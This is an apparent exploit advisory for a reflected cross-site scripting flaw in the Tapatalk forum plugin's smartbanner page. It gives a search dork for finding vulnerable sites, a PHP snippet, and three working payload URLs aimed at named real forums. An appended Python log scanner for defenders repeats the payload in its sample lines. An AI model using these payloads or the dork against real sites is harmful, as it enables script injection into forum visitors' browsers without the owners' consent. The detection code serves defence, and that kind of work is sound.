##################################################################################
Janissaries.Org
##################################################################################
Exploit Title   : Tapatalk Universal Forum Application XSS Vulnerability (All Version)
Author          : E. Burtay Sahin
Author Mail     : admin@burtay.org
Author Homepage : http://www.burtay.org
Community Hpage : http://www.janissaries.org
Google Dork     : inurl:mobiquo
Vendor Homepage : http://tapatalk.com/
Software Link   : http://tapatalk.com/activate_tapatalk.php
Version         : All Version
##################################################################################
P0C

$ads_url = $protocol.'tapatalk.com/welcome_screen.php'
    .'?referer='.urlencode($referer)
    .'&code='.urlencode($code)
    .'&board_url='.urlencode($board_url)
    .'&lang='.urlencode($lang)
    .$byo
    .'&callback=?';
##################################################################################
3 Live Examples

1.) Version ip34_3.8.2
https://forums.plex.tv/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr

2.) Version vb3x_4.3.2
http://forum.xda-developers.com/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr

3.) Version pb30_4.4.0
http://www.passion-multirotor.fr/forum/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr
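
A defender-side check for the kind of request shown in the live examples, added here and not part of the original advisory: it scans access-log lines for hits on mobiquo/smartbanner/welcome.php whose referer, code, board_url or lang value decodes to HTML markup characters. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path taken from the advisory's live examples.
BANNER_PATH = "/mobiquo/smartbanner/welcome.php"
# Query parameters that appear in the advisory's snippet and URLs.
PARAMS = ("referer", "code", "board_url", "lang")
# Characters the advisory's payload relies on to leave an attribute or script block.
MARKUP = re.compile(r'[<>"]')
# Assumption: combined-format access log, request line in double quotes.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Names of banner parameters whose decoded value contains markup."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(BANNER_PATH):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    for name in PARAMS:
        for value in query.get(name, []):
            # parse_qs decodes one layer; unquote again to catch %253C-style double encoding.
            if MARKUP.search(value) or MARKUP.search(unquote(value)):
                hits.append(name)
                break
    return hits

def scan(lines):
    """Return (line number, client address, flagged parameters) per suspicious request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        flagged = suspicious_params(match.group(1)) if match else []
        if flagged:
            findings.append((number, line.split(" ", 1)[0], flagged))
    return findings

# Constructed sample log lines (documentation addresses, example.org host).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2014:13:55:36 +0000] "GET /mobiquo/smartbanner/welcome.php?referer=https%3A%2F%2Fforum.example.org%2F&code=abc123&board_url=https%3A%2F%2Fforum.example.org&lang=en HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Oct/2014:13:56:02 +0000] "GET /forum/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3Etest%3C/h1%3E&code=abc123&board_url=https%3A%2F%2Fforum.example.org&lang=tr HTTP/1.1" 200 640',
    '198.51.100.9 - - [10/Oct/2014:13:56:40 +0000] "GET /mobiquo/smartbanner/welcome.php?referer=x&lang=%253Cb%253E HTTP/1.1" 200 300',
    '203.0.113.7 - - [10/Oct/2014:13:57:11 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that markup was sent to the banner script; whether it was reflected unescaped depends on the installed plugin version.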